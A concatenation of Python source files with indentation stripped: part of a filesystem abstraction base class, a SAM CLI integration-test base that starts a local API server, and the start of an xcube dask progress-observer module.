Since no meta value is guaranteed to exist, it is advisable to always supply a
default value to ``getmeta``.
:param meta_name: The name of the meta value to retrieve
:param default: An option default to return, if the meta value isn't present
:raises `fs.errors.NoMetaError`: If specified meta value is not present, and there is no default
"""
if meta_name not in self._meta:
if default is not NoDefaultMeta:
return default
raise NoMetaError(meta_name=meta_name)
return self._meta[meta_name]
def hasmeta(self, meta_name):
"""Check that a meta value is supported
:param meta_name: The name of a meta value to check
:rtype: bool
"""
try:
self.getmeta(meta_name)
except NoMetaError:
return False
return True
def getsyspath(self, path, allow_none=False):
"""Returns the system path (a path recognized by the OS) if one is present.
If the path does not map to a system path (and `allow_none` is False)
then a NoSysPathError exception is thrown. Otherwise, the system
path will be returned as a unicode string.
:param path: a path within the filesystem
:param allow_none: if True, this method will return None when there is no system path,
rather than raising NoSysPathError
:type allow_none: bool
:raises `fs.errors.NoSysPathError`: if the path does not map on to a system path, and allow_none is set to False (default)
:rtype: unicode
"""
if not allow_none:
raise NoSysPathError(path=path)
return None
def hassyspath(self, path):
"""Check if the path maps to a system path (a path recognized by the OS).
:param path: path to check
:returns: True if `path` maps to a system path
:rtype: bool
"""
return self.getsyspath(path, allow_none=True) is not None
def getpathurl(self, path, allow_none=False):
"""Returns a url that corresponds to the given path, if one exists.
If the path does not have an equivalent URL form (and allow_none is False)
then a :class:`~fs.errors.NoPathURLError` exception is thrown. Otherwise the URL will be
returns as an unicode string.
:param path: a path within the filesystem
:param allow_none: if true, this method can return None if there is no
URL form of the given path
:type allow_none: bool
:raises `fs.errors.NoPathURLError`: If no URL form exists, and allow_none is False (the default)
:rtype: unicode
"""
if not allow_none:
raise NoPathURLError(path=path)
return None
def haspathurl(self, path):
"""Check if the path has an equivalent URL form
:param path: path to check
:returns: True if `path` has a URL form
:rtype: bool
"""
return self.getpathurl(path, allow_none=True) is not None
def open(self, path, mode="r", **kwargs):
"""Open a the given path as a file-like object.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
raise UnsupportedError("open file")
def safeopen(self, path, mode="r", **kwargs):
"""Like :py:meth:`~fs.base.FS.open`, but returns a :py:class:`~fs.base.NullFile` if the file could not be opened.
A ``NullFile`` is a dummy file which has all the methods of a file-like object,
but contains no data.
:param path: a path to file that should be opened
:param mode: mode of file to open, identical to the mode string used
in 'file' and 'open' builtins
:param kwargs: additional (optional) keyword parameters that may
be required to open the file
:rtype: a file-like object
"""
try:
f = self.open(path, mode, **kwargs)
except ResourceNotFoundError:
return NullFile()
return f
def symlink(self, linkto, path):
"""Creates a symlink.
:param linkto: To where symlink links to.
:param path: Path where we want to create symlink.
:rtype: None
"""
raise UnsupportedError("symlink")
def readlink(self, path):
"""Reads a symlink.
:param path: a path of link to read
:rtype: a dir/file where link points to
"""
raise UnsupportedError("readlink")
def exists(self, path):
"""Check if a path references a valid resource.
:param path: A path in the filesystem
:rtype: bool
"""
return self.isfile(path) or self.isdir(path)
def isdir(self, path):
"""Check if a path references a directory.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for directory")
def isfile(self, path):
"""Check if a path references a file.
:param path: a path in the filesystem
:rtype: bool
"""
raise UnsupportedError("check for file")
def __iter__(self):
""" Iterates over paths returned by :py:meth:`~fs.base.listdir` method with default params. """
for f in self.listdir():
yield f
def listdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Lists the the files and directories under a given path.
The directory contents are returned as a list of unicode paths.
:param path: root of the path to list
:type path: string
:param wildcard: Only returns paths that match this wildcard
:type wildcard: string containing a wildcard, or a callable that accepts a path and returns a boolean
:param full: returns full paths (relative to the root)
:type full: bool
:param absolute: returns absolute paths (paths beginning with /)
:type absolute: bool
:param dirs_only: if True, only return directories
:type dirs_only: bool
:param files_only: if True, only return files
:type files_only: bool
:rtype: iterable of paths
:raises `fs.errors.ResourceNotFoundError`: if the path is not found
:raises `fs.errors.ResourceInvalidError`: if the path exists, but is not a directory
"""
raise UnsupportedError("list directory")
def listdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Retrieves a list of paths and path info under a given path.
This method behaves like listdir() but instead of just returning
the name of each item in the directory, it returns a tuple of the
name and the info dict as returned by getinfo.
This method may be more efficient than calling
:py:meth:`~fs.base.FS.getinfo` on each individual item returned by :py:meth:`~fs.base.FS.listdir`, particularly
for network based filesystems.
:param path: root of the path to list
:param wildcard: filter paths that match this wildcard
:param dirs_only: only retrieve directories
:type dirs_only: bool
:param files_only: only retrieve files
:type files_only: bool
:raises `fs.errors.ResourceNotFoundError`: If the path is not found
:raises `fs.errors.ResourceInvalidError`: If the path exists, but is not a directory
"""
path = normpath(path)
def getinfo(p):
try:
if full or absolute:
return self.getinfo(p)
else:
return self.getinfo(pathjoin(path,p))
except FSError:
return {}
return [(p, getinfo(p))
for p in self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only)]
def _listdir_helper(self, path,
entries,
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""A helper method called by listdir method that applies filtering.
Given the path to a directory and a list of the names of entries within
that directory, this method applies the semantics of the listdir()
keyword arguments. An appropriately modified and filtered list of
directory entries is returned.
"""
if dirs_only and files_only:
raise ValueError("dirs_only and files_only can not both be True")
if wildcard is not None:
if not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
entries = [p for p in entries if wildcard(p)]
if dirs_only:
entries = [p for p in entries if self.isdir(pathjoin(path, p))]
elif files_only:
entries = [p for p in entries if self.isfile(pathjoin(path, p))]
if full:
entries = [pathjoin(path, p) for p in entries]
elif absolute:
entries = [abspath(pathjoin(path, p)) for p in entries]
return entries
def ilistdir(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding the files and directories under a given path.
This method behaves identically to :py:meth:`fs.base.FS.listdir` but returns an generator
instead of a list. Depending on the filesystem this may be more
efficient than calling :py:meth:`fs.base.FS.listdir` and iterating over the resulting list.
"""
return iter(self.listdir(path,
wildcard=wildcard,
full=full,
absolute=absolute,
dirs_only=dirs_only,
files_only=files_only))
def ilistdirinfo(self, path="./",
wildcard=None,
full=False,
absolute=False,
dirs_only=False,
files_only=False):
"""Generator yielding paths and path info under a given path.
This method behaves identically to :py:meth:`~fs.base.listdirinfo` but returns an generator
instead of a list. Depending on the filesystem this may be more
efficient than calling :py:meth:`~fs.base.listdirinfo` and iterating over the resulting
list.
"""
return iter(self.listdirinfo(path,
wildcard,
full,
absolute,
dirs_only,
files_only))
def makedir(self, path, recursive=False, allow_recreate=False):
"""Make a directory on the filesystem.
:param path: path of directory
:param recursive: if True, any intermediate directories will also be created
:type recursive: bool
:param allow_recreate: if True, re-creating a directory wont be an error
:type allow_create: bool
:raises `fs.errors.DestinationExistsError`: if the path is already a directory, and allow_recreate is False
:raises `fs.errors.ParentDirectoryMissingError`: if a containing directory is missing and recursive is False
:raises `fs.errors.ResourceInvalidError`: if a path is an existing file
"""
raise UnsupportedError("make directory")
def remove(self, path):
"""Remove a file from the filesystem.
:param path: Path of the resource to remove
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is a directory
"""
raise UnsupportedError("remove resource")
def removedir(self, path, recursive=False, force=False):
"""Remove a directory from the filesystem
:param path: path of the directory to remove
:param recursive: if True, empty parent directories will be removed
:type recursive: bool
:param force: if True, any directory contents will be removed
:type force: bool
:raises `fs.errors.ResourceNotFoundError`: if the path does not exist
:raises `fs.errors.ResourceInvalidError`: if the path is not a directory
:raises `fs.errors.DirectoryNotEmptyError`: if the directory is not empty and force is False
"""
raise UnsupportedError("remove directory")
def rename(self, src, dst):
"""Renames a file or directory
:param src: path to rename
:param dst: new name
"""
raise UnsupportedError("rename resource")
@convert_os_errors
def settimes(self, path, accessed_time=None, modified_time=None):
"""Set the accessed time and modified time of a file
:param path: path to a file
:param accessed_time: a datetime object the file was accessed (defaults to current time)
:param modified_time: a datetime object the file was modified (defaults to current time)
"""
sys_path = self.getsyspath(path, allow_none=True)
if sys_path is not None:
now = datetime.datetime.now()
if accessed_time is None:
accessed_time = now
if modified_time is None:
modified_time = now
accessed_time = int(time.mktime(accessed_time.timetuple()))
modified_time = int(time.mktime(modified_time.timetuple()))
os.utime(sys_path, (accessed_time, modified_time))
return True
else:
raise UnsupportedError("settimes")
def getinfo(self, path):
"""Returns information for a path as a dictionary. The exact content of
this dictionary will vary depending on the implementation, but will
likely include a few common values. The following values will be found
in info dictionaries for most implementations:
* "size" - Number of bytes used to store the file or directory
* "created_time" - A datetime object containing the time the resource was created
* "accessed_time" - A datetime object containing the time the resource was last accessed
* "modified_time" - A datetime object containing the time the resource was modified
:param path: a path to retrieve information for
:rtype: dict
"""
raise UnsupportedError("get resource info")
def desc(self, path):
"""Returns short descriptive text regarding a path. Intended mainly as
a debugging aid.
:param path: A path to describe
:rtype: str
"""
if not self.exists(path):
return ''
try:
sys_path = self.getsyspath(path)
except NoSysPathError:
return "No description available"
return sys_path
def getcontents(self, path):
"""Returns the contents of a file as a string.
:param path: A path of file to read
:rtype: str
:returns: file contents
"""
f = None
try:
f = self.open(path, "rb")
contents = f.read()
return contents
finally:
if f is not None:
f.close()
def setcontents(self, path, data, chunk_size=1024*64):
"""A convenience method to create a new file from a string or file-like object
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read in a chunk, if the implementation has to resort to a read / copy loop
"""
if not data:
self.createfile(path)
else:
f = None
try:
f = self.open(path, 'wb')
if hasattr(data, "read"):
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
chunk = read(chunk_size)
else:
f.write(data)
if hasattr(f, 'flush'):
f.flush()
finally:
if f is not None:
f.close()
def setcontents_async(self,
path,
data,
chunk_size=1024*64,
progress_callback=None,
finished_callback=None,
error_callback=None):
"""Create a new file from a string or file-like object asynchronously
This method returns a ``threading.Event`` object. Call the ``wait`` method on the event object
to block until all data has been written, or simply ignore it.
:param path: a path of the file to create
:param data: a string or a file-like object containing the contents for the new file
:param chunk_size: Number of bytes to read and write in a chunk
:param progress_callback: A function that is called periodically
with the number of bytes written.
:param finished_callback: A function that is called when all data has been written
:param error_callback: A function that is called with an exception
object if any error occurs during the copy process.
:returns: An event object that is set when the copy is complete, call
the `wait` method of this object to block until the data is written
"""
if progress_callback is None:
progress_callback = lambda bytes_written:None
def do_setcontents():
try:
f = None
try:
f = self.open(path, 'wb')
progress_callback(0)
if hasattr(data, "read"):
bytes_written = 0
read = data.read
write = f.write
chunk = read(chunk_size)
while chunk:
write(chunk)
bytes_written += len(chunk)
progress_callback(bytes_written)
chunk = read(chunk_size)
else:
f.write(data)
progress_callback(len(data))
if finished_callback is not None:
finished_callback()
finally:
if f is not None:
f.close()
except Exception, e:
if error_callback is not None:
error_callback(e)
finally:
finished_event.set()
finished_event = threading.Event()
threading.Thread(target=do_setcontents).start()
return finished_event
def createfile(self, path, wipe=False):
"""Creates an empty file if it doesn't exist
:param path: path to the file to create
:param wipe: if True, the contents of the file will be erased
"""
if not wipe and self.isfile(path):
return
f = None
try:
f = self.open(path, 'w')
finally:
if f is not None:
f.close()
def opendir(self, path):
"""Opens a directory and returns a FS object representing its contents.
:param path: path to directory to open
:rtype: an FS object
"""
from fs.wrapfs.subfs import SubFS
if not self.exists(path):
raise ResourceNotFoundError(path)
return SubFS(self, path)
def walk(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False):
"""Walks a directory tree and yields the root path and contents.
Yields a tuple of the path of each directory and a list of its file
contents.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: a string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: a string identifying the method used to walk the directories. There are two such methods:
* ``"breadth"`` yields paths in the top directories first
* ``"depth"`` yields the deepest paths first
:param ignore_errors: ignore any errors reading the directory
"""
def listdir(path, *args, **kwargs):
if ignore_errors:
try:
return self.listdir(path, *args, **kwargs)
except:
return []
else:
return self.listdir(path, *args, **kwargs)
if wildcard is None:
wildcard = lambda f:True
elif not callable(wildcard):
wildcard_re = re.compile(fnmatch.translate(wildcard))
wildcard = lambda fn:bool (wildcard_re.match(fn))
if dir_wildcard is None:
dir_wildcard = lambda f:True
elif not callable(dir_wildcard):
dir_wildcard_re = re.compile(fnmatch.translate(dir_wildcard))
dir_wildcard = lambda fn:bool (dir_wildcard_re.match(fn))
if search == "breadth":
dirs = [path]
while dirs:
current_path = dirs.pop()
paths = []
try:
for filename in listdir(current_path):
path = pathjoin(current_path, filename)
if self.isdir(path):
if dir_wildcard(path):
dirs.append(path)
else:
if wildcard(filename):
paths.append(filename)
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (current_path, paths)
elif search == "depth":
def recurse(recurse_path):
try:
for path in listdir(recurse_path, wildcard=dir_wildcard, full=True, dirs_only=True):
for p in recurse(path):
yield p
except ResourceNotFoundError:
# Could happen if another thread / process deletes something whilst we are walking
pass
yield (recurse_path, listdir(recurse_path, wildcard=wildcard, files_only=True))
for p in recurse(path):
yield p
else:
raise ValueError("Search should be 'breadth' or 'depth'")
def walkfiles(self,
path="/",
wildcard=None,
dir_wildcard=None,
search="breadth",
ignore_errors=False ):
"""Like the 'walk' method, but just yields file paths.
:param path: root path to start walking
:param wildcard: if given, only return files that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the file path and returns a boolean
:param dir_wildcard: if given, only walk directories that match the wildcard
:type dir_wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as walk method
:param ignore_errors: ignore any errors reading the directory
"""
for path, files in self.walk(path, wildcard=wildcard, dir_wildcard=dir_wildcard, search=search, ignore_errors=ignore_errors):
for f in files:
yield pathjoin(path, f)
def walkdirs(self,
path="/",
wildcard=None,
search="breadth",
ignore_errors=False):
"""Like the 'walk' method but yields directories.
:param path: root path to start walking
:param wildcard: if given, only return directories that match this wildcard
:type wildcard: A string containing a wildcard (e.g. `*.txt`) or a callable that takes the directory name and returns a boolean
:param search: same as the walk method
:param ignore_errors: ignore any errors reading the directory
"""
for p, _files in self.walk(path, dir_wildcard=wildcard, search=search, ignore_errors=ignore_errors):
yield p
def getsize(self, path):
"""Returns the size (in bytes) of a resource.
:param path: a path to the resource
:rtype: integer
:returns: the size of the file
"""
info = self.getinfo(path)
size = info.get('size', None)
if size is None:
raise OperationFailedError("get size of resource", path)
return size
def copy(self, src, dst, overwrite=False, chunk_size=1024*64):
"""Copies a file from src to dst.
:param src: the source path
:param dst: the destination path
:param overwrite: if True, then an existing file at the destination may
be overwritten; If False then DestinationExistsError
will be raised.
:param chunk_size: size of chunks to use if a simple copy is required
(defaults to 64K).
"""
if not self.isfile(src):
if self.isdir(src):
raise ResourceInvalidError(src,msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
self._shutil_copyfile(src_syspath, dst_syspath)
else:
src_file = None
try:
src_file = self.open(src, "rb")
self.setcontents(dst, src_file, chunk_size=chunk_size)
except ResourceNotFoundError:
if self.exists(src) and not self.exists(dirname(dst)):
raise ParentDirectoryMissingError(dst)
finally:
if src_file is not None:
src_file.close()
@classmethod
@convert_os_errors
def _shutil_copyfile(cls, src_syspath, dst_syspath):
try:
shutil.copyfile(src_syspath, dst_syspath)
except IOError, e:
# shutil reports ENOENT when a parent directory is missing
if getattr(e,"errno",None) == 2:
if not os.path.exists(dirname(dst_syspath)):
raise ParentDirectoryMissingError(dst_syspath)
raise
@classmethod
@convert_os_errors
def _shutil_movefile(cls, src_syspath, dst_syspath):
shutil.move(src_syspath, dst_syspath)
def move(self, src, dst, overwrite=False, chunk_size=16384):
"""moves a file from one location to another.
:param src: source path
:param dst: destination path
:param overwrite: if True, then an existing file at the destination path
will be silently overwritten; if False then an exception
will be raised in this case.
:param overwrite: When True the destination will be overwritten (if it exists),
otherwise a DestinationExistsError will be thrown
:type overwrite: bool
:param chunk_size: Size of chunks to use when copying, if a simple copy
is required
:type chunk_size: integer
"""
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
# Try to do an os-level rename if possible.
# Otherwise, fall back to copy-and-remove.
if src_syspath is not None and dst_syspath is not None:
if not os.path.isfile(src_syspath):
if os.path.isdir(src_syspath):
raise ResourceInvalidError(src, msg="Source is not a file: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and os.path.exists(dst_syspath):
raise DestinationExistsError(dst)
try:
os.rename(src_syspath, dst_syspath)
return
except OSError:
pass
self.copy(src, dst, overwrite=overwrite, chunk_size=chunk_size)
self.remove(src)
def movedir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""moves a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:param ignore_errors: if True then this method will ignore FSError
exceptions when moving files
:param chunk_size: size of chunks to use when copying, if a simple copy
is required
"""
if not self.isdir(src):
if self.isfile(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
raise ResourceNotFoundError(src)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
src_syspath = self.getsyspath(src, allow_none=True)
dst_syspath = self.getsyspath(dst, allow_none=True)
if src_syspath is not None and dst_syspath is not None:
try:
os.rename(src_syspath,dst_syspath)
return
except OSError:
pass
def movefile_noerrors(src, dst, **kwargs):
try:
return self.move(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
movefile = movefile_noerrors
else:
movefile = self.move
src = abspath(src)
dst = abspath(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src, search="depth"):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
movefile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
self.removedir(dirname)
def copydir(self, src, dst, overwrite=False, ignore_errors=False, chunk_size=16384):
"""copies a directory from one location to another.
:param src: source directory path
:param dst: destination directory path
:param overwrite: if True then any existing files in the destination
directory will be overwritten
:type overwrite: bool
:param ignore_errors: if True, exceptions when copying will be ignored
:type ignore_errors: bool
:param chunk_size: size of chunks to use when copying, if a simple copy
is required (defaults to 16K)
"""
if not self.isdir(src):
raise ResourceInvalidError(src, msg="Source is not a directory: %(path)s")
def copyfile_noerrors(src, dst, **kwargs):
try:
return self.copy(src, dst, **kwargs)
except FSError:
return
if ignore_errors:
copyfile = copyfile_noerrors
else:
copyfile = self.copy
src = abspath(src)
dst = abspath(dst)
if not overwrite and self.exists(dst):
raise DestinationExistsError(dst)
if dst:
self.makedir(dst, allow_recreate=overwrite)
for dirname, filenames in self.walk(src):
dst_dirname = relpath(frombase(src, abspath(dirname)))
dst_dirpath = pathjoin(dst, dst_dirname)
self.makedir(dst_dirpath, allow_recreate=True, recursive=True)
for filename in filenames:
src_filename = pathjoin(dirname, filename)
dst_filename = pathjoin(dst_dirpath, filename)
copyfile(src_filename, dst_filename, overwrite=overwrite, chunk_size=chunk_size)
def isdirempty(self, path):
"""Check if a directory is empty (contains no files or sub-directories)
:param path: a directory path
:rtype: bool
"""
path = normpath(path)
iter_dir = iter(self.listdir(path))
try:
iter_dir.next()
except StopIteration:
return True
return False
def makeopendir(self, path, recursive=False):
"""makes a directory (if it doesn't exist) and returns an FS object for
the newly created directory.
:param path: path to the new directory
:param recursive: if True any intermediate directories will be created
"""
self.makedir(path, allow_recreate=True, recursive=recursive)
dir_fs = self.opendir(path)
return dir_fs
def printtree(self, max_levels=5):
"""Prints a tree structure of the FS object to the console
:param max_levels: The maximum sub-directories to display, defaults to
5. Set to None for no limit
"""
from fs.utils import print_fs
print_fs(self, max_levels=max_levels)
tree = printtree
def browse(self, hide_dotfiles=False):
"""Displays the FS tree in a graphical window (requires wxPython)
:param hide_dotfiles: If True, files and folders that begin with a dot will be hidden
"""
from fs.browsewin import browse
browse(self, hide_dotfiles)
def getmmap(self, path, read_only=False, copy=False):
"""Returns a mmap object for this path.
See http://docs.python.org/library/mmap.html for more details on the mmap module.
:param path: A path on this filesystem
:param read_only: If True, the mmap may not be modified
:param copy: If False then changes wont be written back to the file
:raises `fs.errors.NoMMapError`: Only paths that have a syspath can be opened as a mmap
"""
syspath = self.getsyspath(path, allow_none=True)
if syspath is None:
raise NoMMapError(path)
try:
import mmap
except ImportError:
raise NoMMapError(msg="mmap not supported")
if read_only:
f = open(syspath, 'rb')
access = mmap.ACCESS_READ
else:
if copy:
f = open(syspath, 'rb')
access = mmap.ACCESS_COPY
else:
f = open(syspath, 'r+b')
access = mmap.ACCESS_WRITE
m = mmap.mmap(f.fileno(), 0, access=access)
return m
def flags_to_mode(flags):
"""Convert an os.O_* flag bitmask into an FS mode string."""
if flags & os.O_WRONLY:
if flags & os.O_TRUNC:
mode = "w"
elif flags & os.O_APPEND:
mode = "a"
else:
mode = "r+"
elif flags & os.O_RDWR:
if flags & os.O_TRUNC:
mode = "w+"
elif flags & os.O_APPEND:
mode = "a+"
else:
mode = "r+"
else:
mode = "r"
if flags & os.O_EXCL:
mode += "x"
return mode
|
start_api_integ_base.py
|
from unittest import TestCase
import threading
from subprocess import Popen
import time
import os
import random
try:
from pathlib import Path
except ImportError:
from pathlib2 import Path
class StartApiIntegBaseClass(TestCase):
template = None
binary_data_file = None
integration_dir = str(Path(__file__).resolve().parents[2])
@classmethod
def setUpClass(cls):
# This is the directory for tests/integration which will be used to file the testdata
# files for integ tests
cls.template = cls.integration_dir + cls.template_path
if cls.binary_data_file:
cls.binary_data_file = os.path.join(cls.integration_dir, cls.binary_data_file)
cls.port = str(StartApiIntegBaseClass.random_port())
cls.thread = threading.Thread(target=cls.start_api())
cls.thread.setDaemon(True)
cls.thread.start()
@classmethod
def start_api(cls):
command = "sam"
if os.getenv("SAM_CLI_DEV"):
command = "samdev"
cls.start_api_process = Popen([command, "local", "start-api", "-t", cls.template, "-p", cls.port, "--debug"])
# we need to wait some time for start-api to start, hence the sleep
time.sleep(5)
@classmethod
def tearDownClass(cls):
# After all the tests run, we need to kill the start-api process.
cls.start_api_process.kill()
@staticmethod
def random_port():
return random.randint(30000, 40000)
@staticmethod
def get_binary_data(filename):
if not filename:
return None
with open(filename, "rb") as fp:
return fp.read()
|
progress.py
|
# The MIT License (MIT)
# Copyright (c) 2019 by the xcube development team and contributors
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to
# use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies
# of the Software, and to permit persons to whom the Software is furnished to do
# so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import threading
import time
import traceback
from abc import ABC
from typing import Sequence, Optional, Any, Tuple, Type, List
import dask.callbacks
import dask.diagnostics
from xcube.util.assertions import assert_true, assert_given
class ProgressState:
"""Represents the state of progress."""
def __init__(self, label: str, total_work: float, super_work: float):
self._label = label
self._total_work = total_work
self._super_work = super_work
self._super_work_ahead = 1.
self._exc_info = None
self._traceback = None
self._completed_work = 0.
self._finished = False
self._start_time = None
self._start_time = time.perf_counter()
self._total_time = None
@property
def label(self) -> str:
return self._label
@property
def total_work(self) -> float:
return self._total_work
@property
def super_work(self) -> float:
return self._super_work
@property
def completed_work(self) -> float:
return self._completed_work
@property
def progress(self) -> float:
return self._completed_work / self._total_work
def to_super_work(self, work: float) -> float:
return self._super_work * work / self._total_work
@property
def exc_info(self) -> Optional[Tuple[Type, BaseException, Any]]:
return self._exc_info
@exc_info.setter
def exc_info(self, exc_info: Tuple[Type, BaseException, Any]):
self._exc_info = exc_info
@property
def exc_info_text(self) -> Optional[Tuple[str, str, List[str]]]:
if not self.exc_info:
return None
exc_type, exc_value, exc_traceback = self.exc_info
return (f'{type(exc_value).__name__}',
f'{exc_value}',
traceback.format_exception(exc_type, exc_value, exc_traceback))
@property
def finished(self) -> bool:
return self._finished
@property
def total_time(self) -> Optional[float]:
return self._total_time
@property
def super_work_ahead(self) -> float:
return self._super_work_ahead
@super_work_ahead.setter
def super_work_ahead(self, work: float):
assert_true(work > 0, 'work must be greater than zero')
self._super_work_ahead = work
def inc_work(self, work: float):
assert_true(work > 0, 'work must be greater than zero')
self._completed_work += work
def finish(self):
self._finished = True
self._total_time = time.perf_counter() - self._start_time
class ProgressObserver(ABC):
"""
A progress observer is notified about nested state changes when using the
:class:observe_progress context manager.
"""
def on_begin(self, state_stack: Sequence[ProgressState]):
"""
Called, if an observed code block begins execution.
"""
def on_update(self, state_stack: Sequence[ProgressState]):
"""
Called, if the progress state has changed within an observed code block.
"""
def on_end(self, state_stack: Sequence[ProgressState]):
"""
Called, if an observed block of code ends execution.
"""
def activate(self):
_ProgressContext.instance().add_observer(self)
def deactivate(self):
_ProgressContext.instance().remove_observer(self)
class _ProgressContext:
_instance = None
def __init__(self, *observers: ProgressObserver):
self._observers = set(observers)
self._state_stack = list()
def add_observer(self, observer: ProgressObserver):
self._observers.add(observer)
def remove_observer(self, observer: ProgressObserver):
self._observers.discard(observer)
def emit_begin(self):
for observer in self._observers:
observer.on_begin(self._state_stack)
def emit_update(self):
for observer in self._observers:
observer.on_update(self._state_stack)
def emit_end(self):
for observer in self._observers:
observer.on_end(self._state_stack)
def begin(self, label: str, total_work: float) -> ProgressState:
super_work = self._state_stack[-1].super_work_ahead \
if self._state_stack else 1
progress_state = ProgressState(label, total_work, super_work)
self._state_stack.append(progress_state)
self.emit_begin()
return progress_state
def end(self, exc_type, exc_value, exc_traceback) -> ProgressState:
exc_info = tuple((exc_type, exc_value, exc_traceback))
progress_state = self._state_stack[-1]
progress_state.exc_info = exc_info if any(exc_info) else None
progress_state.finish()
self.emit_end()
self._state_stack.pop()
if self._state_stack:
self._state_stack[-1].super_work_ahead = 1
return progress_state
def worked(self, work: float):
assert_true(self._state_stack,
'worked() method call is missing a current context')
assert_true(work > 0, 'work must be greater than zero')
for s in reversed(self._state_stack):
s.inc_work(work)
work = s.to_super_work(work)
self.emit_update()
def will_work(self, work: float):
assert_true(self._state_stack,
'will_work() method call is missing a current context')
# noinspection PyProtectedMember
self._state_stack[-1].super_work_ahead = work
@classmethod
def instance(cls) -> '_ProgressContext':
return cls._instance
@classmethod
def set_instance(cls, instance: '_ProgressContext' = None) \
-> '_ProgressContext':
cls._instance, old_instance = \
(instance or _ProgressContext()), cls._instance
return old_instance
_ProgressContext.set_instance()
class new_progress_observers:
"""
Takes zero or more progress observers and activates them in the enclosed context.
Progress observers from an outer context will no longer be active.
:param observers: progress observers that will temporarily replace existing ones.
"""
def __init__(self, *observers: ProgressObserver):
self._observers = observers
self._old_context = None
def __enter__(self):
self._old_context = _ProgressContext.set_instance(
_ProgressContext(*self._observers)
)
def __exit__(self, type, value, traceback):
_ProgressContext.set_instance(self._old_context)
class add_progress_observers:
"""
Takes zero or more progress observers and uses them only in the
enclosed context. Any progress observers from an outer context
remain active.
:param observers: progress observers to be added temporarily.
"""
def __init__(self, *observers: ProgressObserver):
self._observers = observers
def __enter__(self):
for observer in self._observers:
observer.activate()
def __exit__(self, type, value, traceback):
for observer in self._observers:
observer.deactivate()
class observe_progress:
"""
Context manager for observing progress in the enclosed context.
:param label: A label.
:param total_work: The total work.
"""
def __init__(self, label: str, total_work: float):
assert_given(label, 'label')
assert_true(total_work > 0, 'total_work must be greater than zero')
self._label = label
self._total_work = total_work
self._state: Optional[ProgressState] = None
@property
def label(self) -> str:
return self._label
@property
def total_work(self) -> float:
return self._total_work
@property
def state(self) -> ProgressState:
self._assert_used_correctly()
return self._state
def __enter__(self) -> 'observe_progress':
self._state = _ProgressContext.instance().begin(self._label,
self._total_work)
return self
def __exit__(self, type, value, traceback):
_ProgressContext.instance().end(type, value, traceback)
# noinspection PyMethodMayBeStatic
def worked(self, work: float):
self._assert_used_correctly()
_ProgressContext.instance().worked(work)
# noinspection PyMethodMayBeStatic
def will_work(self, work: float):
self._assert_used_correctly()
_ProgressContext.instance().will_work(work)
def _assert_used_correctly(self):
assert_true(self._state is not None,
'observe_progress() must be used with "with" statement')
class observe_dask_progress(dask.callbacks.Callback):
"""
Observe progress made by Dask tasks.
:param label: A label.
:param total_work: The total work.
:param interval: Time in seconds to between progress reports.
:param initial_interval: Time in seconds to wait before progress
